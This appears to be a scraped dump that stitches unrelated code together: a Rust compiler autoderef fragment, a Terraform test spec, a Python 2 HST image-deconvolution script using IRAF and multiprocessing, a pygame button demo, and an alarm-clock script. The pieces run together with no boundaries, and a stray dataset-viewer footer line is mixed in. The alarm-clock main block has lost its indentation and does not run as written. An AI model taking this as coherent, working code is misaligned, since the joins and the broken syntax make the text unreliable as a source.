    /// `core::ops::Deref` and `core::ops::Deref::Target`
    pub fn use_receiver_trait(mut self) -> Self {
        self.use_receiver_trait = true;
        self
    }
    /// Do not emit the recursion-limit diagnostic when the limit is hit.
    pub fn silence_errors(mut self) -> Self {
        self.silence_errors = true;
        self
    }
}
/// Emits the "reached the recursion limit while auto-dereferencing"
/// diagnostic for `ty` at `span`, suggesting a doubled
/// `#![recursion_limit]` value.
pub fn report_autoderef_recursion_limit_error<'tcx>(
    tcx: TyCtxt<'tcx>,
    span: Span,
    ty: Ty<'tcx>,
) -> ErrorGuaranteed {
    // We've reached the recursion limit, error gracefully.
    let suggested_limit = match tcx.recursion_limit() {
        Limit(0) => Limit(2),
        limit => limit * 2,
    };
    tcx.dcx().emit_err(AutoDerefReachedRecursionLimit {
        span,
        ty,
        suggested_limit,
        crate_name: tcx.crate_name(LOCAL_CRATE),
    })
}
{
"description": "tests adding and removing elements from a simple list",
"include_files": [],
"ignore_fields": {}
} | json | github | https://github.com/hashicorp/terraform | testing/equivalence-tests/tests/basic_list_update/spec.json |
#!/usr/bin/env python
'''
------------------------------------------------------------------------
Multicore Parallel Sub-Sampled Deconvolution
Deconvolve HST WFPC2/ACS images with spatially varying point spread function.
As each section of image is independent of the other sections, they can
easily be deconvolved in 'embarrassingly parallel' way. 256x256 image
sections are subsampled and deconvolved with constant PSF for that location
of CCD.
Usage : python deconvolve.py image psf nsub
image : degraded image to be deconvolved
psf : spatially varying point spread function
nsub : subsampling ( e.g. 2, 3 etc.)
[options]
--help : help
--version : program version
--verbose : display messages on stdout
--quiet : don't display messages on stdout
--outfile : output file name
--mode : multicore processing mode (process or pool)
--ncpus : number on processors to use for multicore processing
Output :
Sub-sampled deconvolved image
Author:
Navtej Singh
Organization:
Centre for Astronomy, National University of Ireland, Galway, Ireland
Version:
20 February 2012 1.0 Original version
------------------------------------------------------------------------
'''
# Load python modules to be used in the routine
import os, sys, math, subprocess, pyfits
import numpy as np
from optparse import OptionParser
from StringIO import StringIO
from ConfigParser import SafeConfigParser
# Check if the multiprocessing module is present
try:
    import multiprocessing as mp
# Narrowed from a bare `except:` so only a genuinely missing module aborts,
# instead of masking unrelated errors (KeyboardInterrupt, SystemExit, ...).
except ImportError:
    print >> sys.stderr, 'Error: Python multiprocessing module not found. Exiting.'
    sys.exit( -1 )
# Load required IRAF packages
def loadPackages():
    # NOTE(review): `iraf` is not imported in this file's visible header --
    # presumably provided by pyraf elsewhere; verify before reuse.
    # Load the STSDAS restoration and NOAO DAOPHOT packages quietly
    # (_doprint=0 suppresses the package banner output).
    iraf.stsdas(_doprint = 0)
    iraf.stsdas.analysis(_doprint = 0)
    iraf.stsdas.analysis.restore(_doprint = 0)
    iraf.noao(_doprint = 0)
    iraf.noao.artdata(_doprint = 0)
    iraf.noao.digiphot(_doprint = 0)
    iraf.noao.digiphot.daophot(_doprint = 0)
# Generate x,y pixel positions for psf generation
def getPsfCoords(dimx, dimy, radius = 64):
    """Return the (x, y) PSF grid positions for a dimx x dimy CCD: every
    multiple of `radius` that also lies on the 128-pixel grid."""
    print >> sys.stdout, '\n Generating pixel positions for psf generation...'
    return [(i, j)
            for i in range(radius, dimx, radius)
            for j in range(radius, dimy, radius)
            if i % 128 == 0 and j % 128 == 0]
# Generate image sections to be deconvolved. 256x256 sections are taken
def getChunks(dimx, dimy, radius = 64):
    # Build one 256x256 section centered on each PSF grid position,
    # clamped to the CCD boundaries; returns (psf positions, sections).
    psfxy = getPsfCoords(dimx, dimy, radius)
    print >> sys.stdout, '\n Generating image sections for deconvolution...'
    in_coords = []
    for value in psfxy:
        # 127 pixels below / 128 above the psf centre (1-based, inclusive).
        mix1, mix2 = value[0] - 127, value[0] + 128
        miy1, miy2 = value[1] - 127, value[1] + 128
        # Clamp to the lower edge.  NOTE(review): the `> -1e+8` guard only
        # matters for a large negative sentinel (cf. -1e+16 in pasteCoords);
        # coordinates from getPsfCoords always satisfy it.
        if mix1 < 1 and mix1 > -1e+8:
            mix1 = 1
        else:
            mix1 = mix1
        if miy1 < 1 and miy1 > -1e+8:
            miy1 = 1
        else:
            miy1 = miy1
        # Clamp to the upper edge of the CCD.
        if mix2 > dimx:
            mix2 = dimx
        else:
            mix2 = mix2
        if miy2 > dimy:
            miy2 = dimy
        else:
            miy2 = miy2
        in_coords.append((mix1, mix2, miy1, miy2))
    return psfxy, in_coords
# Create input and output coordinates for pasting
def pasteCoords(imgxy, dimx, dimy, nsub):
    # Scale each 1-based (x1, x2, y1, y2) section up to the nsub-subsampled
    # grid, then compute where each deconvolved section is pasted
    # (out_coords) and which part of the section to take (mem_coords).
    sub_coords = []
    for value in imgxy:
        sub_coords.append((nsub * (value[0] - 1) + 1, nsub * value[1], nsub * (value[2] - 1) + 1, nsub * value[3]))
    mem_coords, out_coords = [], []
    # Generate MEM output coordinates
    for value in sub_coords:
        # X1 and X2 values: trim the 64-pixel overlap off every edge that
        # is not an image boundary so adjacent sections butt together.
        if value[0] != 1:
            x1 = value[0] + 64 * nsub
        else:
            x1 = value[0]
        if value[1] != (dimx * nsub):
            x2 = value[1] - 64 * nsub
        else:
            x2 = value[1]
        # Y1 and Y2 values
        if value[2] != 1:
            y1 = value[2] + 64 * nsub
        else:
            y1 = value[2]
        if value[3] != (dimy * nsub):
            y2 = value[3] - 64 * nsub
        else:
            y2 = value[3]
        out_coords.append((x1, x2, y1, y2))
    # Generate MEM coordinates for input deconvolved sections.
    # -1e+16 acts as an "invalid" sentinel; the `> -1e+8` tests let it pass
    # through untouched.
    for value in out_coords:
        # X1 and X2 coordinates
        if value[0] != 1 and value[0] > -1e+8:
            x1 = (64 * nsub) + 1
        elif value[0] > -1e+8:
            x1 = 1
        else:
            x1 = -1e+16
        if value[1] != nsub * dimx and value[1] > -1e+8:
            x2 = 192 * nsub
        elif value[1] > -1e+8:
            x2 = 160 * nsub
        else:
            x2 = -1e+16
        # Y1 and Y2 coordinates
        if value[2] != 1 and value[2] > -1e+8:
            y1 = ( 64 * nsub ) + 1
        elif value[2] > -1e+8:
            y1 = 1
        else:
            y1 = -1e+16
        # NOTE(review): this compares the Y2 coordinate against `dimx`,
        # while the pass above used `dimy` (L-equivalent) -- looks like a
        # copy-paste slip that only matters for non-square images; confirm
        # before changing.
        if value[3] != nsub * dimx and value[3] > -1e+8:
            y2 = 192 * nsub
        elif value[3] > -1e+8:
            y2 = 160 * nsub
        else:
            y2 = -1e+16
        mem_coords.append((x1, x2, y1, y2))
    return mem_coords, out_coords
# Function to copy FITS image or image section (uses pyfits to handle FITS files)
def imcopy(infile, outfile, dim = None):
    # When `outfile` has no "[x1:x2,y1:y2]" suffix this is a plain file
    # copy; otherwise `infile` is pasted into a dim x dim zero array at
    # that section and written out.  Returns the (suffix-free) output path.
    print >> sys.stdout, 'Copying ', infile, ' ----> ', outfile
    if len(outfile.split('[')) == 1:
        # NOTE(review): shell=True with interpolated paths works for this
        # local pipeline, but paths containing spaces or shell
        # metacharacters will break; an argument list would be safer.
        subprocess.call('cp ' + infile + ' ' + outfile, shell = True)
    else:
        if not dim:
            print >> sys.stderr, 'Error : for image section copying, dim parameter cannot be None. Exiting.'
            sys.exit(-1)
        header = pyfits.getheader(infile)
        output = np.zeros((dim, dim), dtype = np.float32)
        try:
            f1 = pyfits.open(infile)
        except:
            print >> sys.stderr, 'Error : Not able to open ', infile, '. Exiting.'
            sys.exit(-1)
        # Parse the FITS-style 1-based section bounds out of the suffix.
        x1, x2 = int(outfile.split('[')[1].replace(']', '').split(',')[0].split(':')[0]), int(outfile.split('[')[1].replace(']', '').split(',')[0].split(':')[1])
        y1, y2 = int(outfile.split('[')[1].replace(']', '').split(',')[1].split(':')[0]), int(outfile.split('[')[1].replace(']', '').split(',')[1].split(':')[1])
        # NOTE(review): the 1-based coordinates are used directly as 0-based
        # numpy slice bounds -- confirm the off-by-one is intentional.
        output[x1:x2, y1:y2] = f1[0].data
        outfile = outfile.split('[')[0]
        # Remove any stale output before writing (pyfits.writeto refuses to
        # overwrite by default).
        subprocess.call('rm -f ' + outfile, shell = True)
        pyfits.writeto(outfile, output, header = header)
    return outfile
# Generate psf image from psf lookup tables
def seepsf(psf, x, y, dim):
    """Render a PSF image at position (x, y) from a DAOPHOT psf lookup table.

    psf -- psf lookup-table FITS file
    x, y -- position at which to evaluate the spatially varying psf
    dim -- requested psf image size in pixels
    If dim is not a power of two, the rendered psf is padded (centred) up to
    the next power of two.  Returns the psf image file name.
    """
    seepsfimg_t = psf.replace('.fits', '_seepsf_' + str(x) + '_' + str(y) + 't.fits')
    subprocess.call('rm -f ' + seepsfimg_t, shell = True)
    print >> sys.stdout, '\n Generating psf image : ', seepsfimg_t
    iraf.seepsf(psf, seepsfimg_t, dimension = dim, x = x, y = y)
    # Pad to the next power of two when dim is not already one
    n = math.log(dim, 2)
    if math.ceil(n) != math.floor(n):
        psfdim = int(2 ** (math.floor(n) + 1))
        seepsfimg = psf.replace('.fits', '_seepsf_' + str(x) + '_' + str(y) + '.fits')
        # Using imcopy method instead of IRAF imcopy function as IRAF imcopy task is failing in parallel mode
        # BUGFIX/future-proofing: use explicit floor division '//' (identical
        # result for ints in Python 2, and safe if ever run under Python 3)
        if (psfdim - dim) % 2 == 0:
            cut = (psfdim - dim) // 2
            imcopy(seepsfimg_t, seepsfimg + '[' + str(cut) + ':' + str(psfdim - cut) + ',' + str(cut) + ':' + str(psfdim - cut) + ']', psfdim)
        else:
            # Odd padding: split as evenly as possible between the two sides
            cut1 = (psfdim - dim) // 2
            cut2 = (psfdim - dim) - cut1
            imcopy(seepsfimg_t, seepsfimg + '[' + str(cut2) + ':' + str(psfdim - cut1) + ',' + str(cut2) + ':' + str(psfdim - cut1) + ']', psfdim)
    else:
        seepsfimg = psf.replace('.fits', '_seepsf_' + str(x) + '_' + str(y) + '.fits')
        subprocess.call('rm -f ' + seepsfimg , shell = True)
        subprocess.call('cp ' + seepsfimg_t + ' ' + seepsfimg, shell = True)
    # Cleanup - remove temporary seepsf files
    subprocess.call('rm -f ' + seepsfimg_t, shell = True)
    return seepsfimg
# Create output blank image
def createBlankImage(image, outfile = None, nsub = 1):
    """Create a zero-filled output image, block-replicated by nsub in both axes.

    image -- input image name, optionally with a '[ext]' extension suffix
    outfile -- output name; derived from image when not given
    nsub -- block replication factor for each axis
    Returns the output image name.
    """
    if not outfile:
        parts = image.rsplit('[', 1)
        basename = parts[0]
        if len(parts) > 1:
            # Multi-extension input: embed the extension number in the name
            extn = parts[1].replace(']', '')
            outfile = basename.replace('.fits', '.' + extn + '_mem.fits')
        else:
            outfile = basename.replace('.fits', '.mem.1.fits')
    subprocess.call('rm -f ' + outfile, shell = True)
    # Block-replicate to the subsampled size, then zero every pixel
    iraf.blkrep(image, outfile, b1 = nsub, b2 = nsub)
    iraf.imreplace(outfile, 0, upper = 'INDEF', lower = 'INDEF')
    return outfile
# Deconvolve image section using Maximum Entropy Method
def mem(image, psf, psfxy, imgxy, psfrad, nsub):
    """Deconvolve one image section with IRAF's MEM (maximum entropy) task.

    image  -- input FITS image name (the section from imgxy is appended)
    psf    -- DAOPHOT psf lookup-table file
    psfxy  -- (x, y) psf evaluation position for this section
    imgxy  -- (x1, x2, y1, y2) section coordinates within the image
    psfrad -- psf radius in pixels
    nsub   -- subsampling factor passed to the MEM task
    Returns the name of the deconvolved output image for this section.
    Runs in a worker process, so IRAF packages are (re)loaded here.
    """
    # Load IRAF packages
    loadPackages()
    # Generate psf image for the image section; psf image spans the full
    # psf diameter at the subsampled resolution (odd size, centred)
    dim = 2 * int(psfrad) * nsub + 1
    # Create psf image from psf tables
    psfimg = seepsf(psf, psfxy[0], psfxy[1], dim)
    outimg = image.rsplit('[', 1)[0].replace('.fits', '.mem_' + str(psfxy[0]) + '_' + str(psfxy[1]) + '.fits')
    subprocess.call('rm -f ' + outimg, shell = True)
    # Read MEM deconvolution parameters from configuration file
    parser = SafeConfigParser()
    if not parser.read('deconvolve.cfg'):
        print >> sys.stderr, 'Error: Not able to open deconvolve.cfg configuraton file. Exiting.'
        sys.exit(-1)
    # Deconvolve the image section; every MEM tuning parameter comes from the
    # [mem] section of deconvolve.cfg
    iraf.mem(image + "[" + str(imgxy[0]) + ":" + str(imgxy[1]) + "," + str(imgxy[2]) + ":" + str(imgxy[3]) + "]", psf = psfimg, model = '', output = outimg, noise = parser.get('mem', 'noise'), adu = parser.get('mem', 'adu'), nsub = nsub, poisson = parser.get('mem', 'poisson'), tp = parser.get('mem', 'tp'), blksum = parser.get('mem', 'blksum'), guess = parser.get('mem', 'guess'), icf = parser.get('mem', 'icf'), hidden = parser.get('mem', 'hidden'), aim = parser.get('mem', 'aim'), maxiter = parser.get('mem', 'maxiter'), message = parser.get('mem', 'message'), m_update = parser.get('mem', 'm_update'), method = parser.get('mem', 'method'))
    # Clean up - remove seepsf file
    subprocess.call('rm -f ' + psfimg, shell = True)
    return outimg
# Combine overlapping deconvolved image sections to generate final deconvolved image
def paste(image, mem_imgs, imgxy, dimx, dimy, nsub, outfile):
    """Mosaic the deconvolved sections into the final output image.

    image -- original input image (used to size the blank output)
    mem_imgs -- deconvolved section images, in chunk order
    imgxy -- section coordinates matching mem_imgs
    dimx, dimy -- original image dimensions
    nsub -- subsampling factor
    outfile -- output image name (or None to derive one)
    Returns the name of the final deconvolved image.
    """
    memimg = createBlankImage(image, outfile, nsub)
    # Determine source/destination coordinates for pasting
    mem_coords, out_coords = pasteCoords(imgxy, dimx, dimy, nsub)
    # Paste each deconvolved section into its place in the mosaic
    for img, src, dst in zip(mem_imgs, mem_coords, out_coords):
        srcsec = img + '[' + str(src[0]) + ':' + str(src[1]) + ',' + str(src[2]) + ':' + str(src[3]) + ']'
        dstsec = memimg + '[' + str(dst[0]) + ':' + str(dst[1]) + ',' + str(dst[2]) + ':' + str(dst[3]) + ']'
        iraf.imcopy(srcsec, dstsec)
    # Clean up - remove the MEM deconvolved image sections
    for img, _ in zip(mem_imgs, mem_coords):
        subprocess.call('rm -f ' + img, shell = True)
    return memimg
# Multicore process/queue worker function
def process_worker(s_q, r_q):
    """Queue worker: deconvolve chunks pulled from s_q until a 'STOP' sentinel.

    s_q -- send queue carrying (index, image, psf, psfxy, imgxy, psfrad, nsub)
    r_q -- receive queue; each result is put back as (index, outimg)
    """
    while True:
        task = s_q.get()
        if task == 'STOP':
            break
        idx, image, psf, psfxy, imgxy, psfrad, nsub = task
        r_q.put((idx, mem(image, psf, psfxy, imgxy, psfrad, nsub)))
# Multicore pool/map worker function
def pool_worker(indata):
    """Pool worker: deconvolve a single chunk tuple, returning (index, outimg)."""
    idx = indata[0]
    # Remaining fields: image, psf, psfxy, imgxy, psfrad, nsub
    outimg = mem(indata[1], indata[2], indata[3], indata[4], indata[5], indata[6])
    return (idx, outimg)
# Main function of deconvolution routine
def deconvolve(image, psf, nsub, outfile = None, mode = 'process', ncpus = None):
    """Deconvolve an image with a spatially varying psf using multiprocessing.

    image   -- input FITS image (optionally with '[ext]' section)
    psf     -- DAOPHOT psf lookup-table file
    nsub    -- subsampling factor (int)
    outfile -- final output image name (derived when None)
    mode    -- 'pool' uses mp.Pool.map; anything else uses explicit
               Process/Queue workers
    ncpus   -- worker count; defaults to mp.cpu_count()
    """
    # Determine image dimensions
    iraf.imgets(image, 'i_naxis1')
    dimx = int(iraf.imgets.value)
    iraf.imgets(image, 'i_naxis2')
    dimy = int(iraf.imgets.value)
    # Determine PSF radius
    iraf.imgets(psf, 'psfrad')
    psfrad = float(iraf.imgets.value)
    # Calculate image section coordinates
    psfxy, imgxy = getChunks(dimx, dimy)
    # Generate dataset chunks to be processed; the leading index restores
    # ordering after parallel execution
    chunks = []
    for i in range(len(psfxy)):
        chunks.append((i, image, psf, psfxy[i], imgxy[i], psfrad, nsub))
    # Determine number of processors or get the value from user
    if ncpus:
        n_cpus = int(ncpus)
    else:
        n_cpus = mp.cpu_count()
    # Based on multicore mode (process or pool), follow different paths
    if mode == 'pool':
        pool = mp.Pool(n_cpus)
        result = pool.map(pool_worker, chunks)
        # BUGFIX: shut the pool down cleanly instead of leaking its workers
        pool.close()
        pool.join()
    else:
        # Create send and receive queues
        send_q = mp.Queue()
        recv_q = mp.Queue()
        # Start processes equal to number of processors
        workers = []
        for i in range(n_cpus):
            p = mp.Process(target = process_worker, args = (send_q, recv_q))
            p.start()
            workers.append(p)
        # Send data to send queue
        for chunk in chunks:
            send_q.put(chunk)
        # Receive result in receive queue
        result = []
        for i in range(len(chunks)):
            result.append(recv_q.get())
        # Stop all the running processes
        for i in range(n_cpus):
            send_q.put('STOP')
        # BUGFIX: wait for the workers to exit so no zombie processes remain
        for p in workers:
            p.join()
    # Sort the result list by chunk index to have the right series for pasting
    result = sorted(result, key = lambda item: item[0])
    # Generate final deconvolved image by pasting image sections
    mem_imgs = [value[1] for value in result]
    deconv_img = paste(image, mem_imgs, imgxy, dimx, dimy, nsub, outfile)
    print >> sys.stdout, '\n Final Deconvolved Image : ', deconv_img, '\n'
# Input validation function, calls main deconvolution routine
def main(image, psf, nsub, outfile = None, mode = None, ncpus = None):
    """Validate command-line inputs and invoke the deconvolution routine.

    Exits with status -1 on a missing image/psf file or a missing extension
    on a multi-extension FITS image.
    """
    if not os.path.exists(image.rsplit('[', 1)[0]):
        print >> sys.stderr, 'Error: Image ', image, ' does not exist. Exiting.'
        sys.exit(-1)
    # If multi-extension file, check if the user entered the extension or not
    if len(pyfits.open(image.rsplit('[', 1)[0])) > 1 and len(image.rsplit('[', 1)) == 1:
        # BUGFIX: this error was printed to stdout; send it to stderr like the
        # other validation failures
        print >> sys.stderr, 'Error : Multi-extension FITS image. Please provide image extension. Exiting.'
        sys.exit(-1)
    if not os.path.exists(psf):
        print >> sys.stderr, 'Error: PSF file ', psf, ' does not exist. Exiting.'
        sys.exit(-1)
    deconvolve(image, psf, int(nsub), outfile, mode, ncpus)
# Entry point for deconvolution utility
if __name__ == '__main__':
    usage = "Usage: python %prog [options] image psf nsub"
    description = "Description. Utility to deconvolve image with spatially varying psf in multiprocessing mode.\nMaximum entropy method is used with subsampling (nsub should be greater than 1)."
    parser = OptionParser(usage = usage, version = "%prog 1.0", description = description)
    parser.add_option("-v", "--verbose",
                      action="store_true", dest="verbose", default = False,
                      help = "print result messages to stdout"
                      )
    parser.add_option("-q", "--quiet",
                      action="store_false", dest="verbose", default = True,
                      help = "don't print result messages to stdout"
                      )
    parser.add_option("-o", "--outfile", dest = "filename",
                      action='store', metavar="FILE", help = "output file name"
                      )
    parser.add_option("-m", "--mode", dest = "mode", metavar="MODE",
                      action="store", help = "multiprocessing mode (pool or process) [default is pool]",
                      choices=['process', 'pool'], default = 'pool'
                      )
    parser.add_option("-n", "--ncpus", dest = "ncpus", metavar="NCPUS",
                      action="store", help = "number of cpus (cores) for processing"
                      )
    (options, args) = parser.parse_args()
    # Check for number of input arguments
    if len(args) != 3:
        parser.error("Incorrect number of arguments. Check help for more details.")
    # BUGFIX: args[2] is a string, and in Python 2 any string compares greater
    # than any int, so the old "args[2] <= 1" check could never fire; validate
    # the integer value instead
    try:
        nsub_value = int(args[2])
    except ValueError:
        parser.error("Subsampling should be an integer greater than 1. Check help for more details.")
    if nsub_value <= 1:
        parser.error("Subsampling should be greater than 1. Check help for more details.")
    print >> sys.stdout, '\n Starting processing...'
    # Check verbosity: in quiet mode, redirect stdout to an in-memory buffer
    if not options.verbose:
        output = StringIO()
        old_stdout = sys.stdout
        sys.stdout = output
    # Check if pyraf module is installed
    try:
        from pyraf import iraf
    except ImportError:
        print >> sys.stderr, 'Error: Python module pyraf not found. Exiting.'
        sys.exit(-1)
    main(args[0], args[1], args[2], options.filename, options.mode, options.ncpus)
    # Reset verbosity
    if not options.verbose:
        sys.stdout = old_stdout
    print >> sys.stdout, '\n Process completed successfully.'
import pygame, sys
from pygame.locals import *
TIMER = 30          # frames per second for the main loop
SCREEN_X = 200
SCREEN_Y = 200
pygame.init()       # BUGFIX: initialize pygame before creating the display
screen = pygame.display.set_mode((SCREEN_X, SCREEN_Y))
clock = pygame.time.Clock() #tick-tock
ending = button1 = button2 = False
corner1 = (28,18) #Top Left corner of button 1
corner2 = (56,18) #Top Left corner of button 2
image_length = 100 #length of the buttons
image_height = 100 #height of the buttons
counter = 0
#Main Loop:
while not ending:
    counter += 1
    clock.tick(TIMER)
    for event in pygame.event.get():
        if event.type == QUIT:
            # BUGFIX: honour the window close button, which was previously ignored
            ending = True
            print("Game Stopped Early by user")
        elif event.type == KEYDOWN:
            if event.key == K_ESCAPE:
                ending = True # Time to leave
                print("Game Stopped Early by user")
        elif event.type == MOUSEBUTTONDOWN:
            if event.button == 1:
                mouse_x, mouse_y = event.pos
                # Hit-test each button's axis-aligned rectangle
                if (corner1[0] <= mouse_x <= corner1[0]+image_length) and (corner1[1] <= mouse_y <= corner1[1]+image_height):
                    print ("Button one is selected")
                    button1 = True
                    button2 = False
                elif (corner2[0] <= mouse_x <= corner2[0]+image_length) and (corner2[1] <= mouse_y <= corner2[1]+image_height):
                    print ("Button two is selected")
                    button1 = False
                    button2 = True
                else:
                    print ("That's not a button")
                    button1 = False
                    button2 = False
    if counter == TIMER: #prints the statements once a second
        counter = 0
        if button1:
            print ("Button one is currently selected")
        elif button2:
            print ("Button two is currently selected")
        else:
            print ("No buttons currently selected")
pygame.quit()       # BUGFIX: shut pygame down cleanly when the loop exits
"""
Alarm Clock - A simple clock where it plays a sound after
X number of minutes/seconds or at a particular time.
Dependencies:
pyglet
pip install pyglet
"""
import time
import winsound
import pyglet
def play(hh, mm):
    """Block until local time reaches hh:mm, then play the alarm sound.

    hh, mm -- target hour (0-23) and minute (0-59)
    Plays 'bin/sound.wav' via pyglet when the time matches, then returns.
    """
    while True:
        now = time.localtime()   # current local time
        if now.tm_hour == hh and now.tm_min == mm:
            song = pyglet.media.load('bin/sound.wav')
            song.play()          # play the sound
            pyglet.app.run()
            break                # alarm fired; stop polling
        # BUGFIX: sleep between polls instead of busy-waiting at 100% CPU
        time.sleep(1)
if __name__ == '__main__':
print """
1. Play sound after X minutes
2. Play sound at an exact time
"""
choice = input('What do you want to do? ')
if choice == 1:
mins = input('How many minutes from now? ')
hh_from_now = mins / 60 # if minutes > 60, this will adjust the hours
mm_from_now = mins % 60 # and then the minutes
cur_time = list(time.localtime()) # get the time right now
hour = cur_time[3] # find the current hour
minute = cur_time[4] # and the current minute
hh = (hour + hh_from_now+(minute+mm_from_now)/60) % 24 # cycle through the clock if hh > 24
mm = (minute + mm_from_now) % 60 # cycle through the clock if mm > 60
play(hh, mm)
elif choice == 2:
hh = input('What hour do you want to wake up (0-23)? ')
mm = input('What minute do you want to wake up (0-59)? ')
play(hh, mm) | unknown | codeparrot/codeparrot-clean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.